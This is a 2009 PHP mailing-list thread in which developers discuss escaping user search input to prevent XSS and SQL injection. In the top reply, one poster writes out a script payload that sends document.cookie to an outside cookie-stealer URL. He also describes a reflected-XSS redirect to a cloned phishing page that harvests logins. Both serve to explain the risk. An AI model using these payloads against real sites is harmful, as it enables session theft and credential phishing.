You can write your a cookiestealer in a few moments using XSS: <script> document.location="http://php.net/cookiestealer.php?cookie="+document.cookie; </script> It's not that hard ;) If I would see such a XSS vulnerability I would add something like: youwebsite.com/index.php?searchquery=<script>window.location="http://myphishingpage.com";;</script> (of course that everything will be URL encoded, etc) Then your users will be redirected through YOUR domain name, to my webpage, which will contain an exact copy of your page and will require users to re-login to the system ;) (and log their login information) There are tons of options, I have investigated one of them, just make sure your input is what it should be and you will be good (also make sure you don't execute in any way your input, neither at exec()/system()/eval() nor at a database query). (by the way, do you aware of XSRF/CSRF??) HTH, Nitsan On Wed, Jun 10, 2009 at 7:09 PM, Ashley Sheridan <ash@xxxxxxxxxxxxxxxxxxxx> wrote: > > On Wed, 2009-06-10 at 12:55 -0400, Eddie Drapkin wrote: > > The problem with using a database escaping string for output escaping > > is that something like (despite being the world's lamest XSS) > > <script> > > location.href('google.com') > > </script> > > Would output mostly the same and with some cleverness, it wouldn't be > > too hard to get that to function properly with a full fledged XSS > > attack. I'd personally use one of the FILTER_* constants in > > conjunction with the filter functions themselves, say filter_var and > > FILTER_SANITIZE_SPECIAL_CHARS. > > > > > > On Wed, Jun 10, 2009 at 12:44 PM, Ashley Sheridan > > <ash@xxxxxxxxxxxxxxxxxxxx> wrote: > > On Wed, 2009-06-10 at 18:28 +0200, Nitsan Bin-Nun wrote: > > > mysql_real_escape_string() only sanitise the input. I would > > personally > > > only allow [a-zA-Z0-9-_] in search string but that's just > > me ;) > > > Validate the input in some way, or make extra sanitisation > > of it > > > before running the search query. > > > > > > Regarding the HTML output, just entities() it and you'll be > > good :) > > > > > > On Wed, Jun 10, 2009 at 6:32 PM, Ashley Sheridan > > > <ash@xxxxxxxxxxxxxxxxxxxx> wrote: > > > > > > On Wed, 2009-06-10 at 18:18 +0200, Nitsan Bin-Nun > > wrote: > > > > As far for the output, just html entities () it > > and you will > > > be good. > > > > > > > > You better check the search query for sql > > injection, which > > > is more > > > > dangerous. > > > > > > > > HTH > > > > Nitsan > > > > > > > > > > On Wed, Jun 10, 2009 at 6:19 PM, Ashley Sheridan > > > > <ash@xxxxxxxxxxxxxxxxxxxx> wrote: > > > > Hi all, > > > > > > > > I'm looking at adding a new search feature > > to my > > > site, and one > > > > of the > > > > elements of this is to echo back in the > > search > > > results page, > > > > the > > > > original string the user searched for. Up > > until now, > > > XSS > > > > hasn't (afaik) > > > > been an issue for my site, but I can see > > from a mile > > > off this > > > > will be. > > > > What would you guys recommend to avoid > > this? > > > > > > > > I'd thought initially of using a mixture > > of > > > > html_special_chars() and a > > > > regex (as yet not sure what I'll be > > stripping out > > > with this) > > > > to sanitise > > > > the output for display on the results > > page, but is > > > this > > > > enough? > > > > > > > > Thanks > > > > Ash > > > > www.ashleysheridan.co.uk > > > > > > > > > > > > > > > > I always use mysql_real_escape_string() for that > > sort of > > > thing, not had > > > a problem with it, but is there anything you think I > > should be > > > wary of? > > > > > > > > > Thanks > > > Ash > > > www.ashleysheridan.co.uk > > > > > > > > > > > > > > > > [just bringing it back on list] > > > > Well, I don't understand, what is the problem with > > mysql_real_escape_string() for sanitising input to use for a > > search? It > > should escape anything out so that the query can't be used in > > ways that > > I don't want no? > > > > I'd thought about using a whitelist-only regex, but that seems > > a little > > limiting tbh, and as my site contains code, it's not > > unreasonable to > > expect some people might want to search for particular code > > excerpts. > > > > > > > > Thanks > > Ash > > www.ashleysheridan.co.uk > > > > > > > > -- > > PHP General Mailing List (http://www.php.net/) > > To unsubscribe, visit: http://www.php.net/unsub.php > > > > > Oh no, I think I'm misunderstood here. I was going to use > mysql_real_escape_string only for the database input, and use > htmlentities for the display output, as essentially they are separate, > and should be treated as such. > > I've been doing a bit of reading, and I can't really understand why XSS > is such an issue. Sure, if a user can insert a <script> tag, what > difference will that make to anyone else, as it is only on their own > browser. > > Thanks > Ash > www.ashleysheridan.co.uk > -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
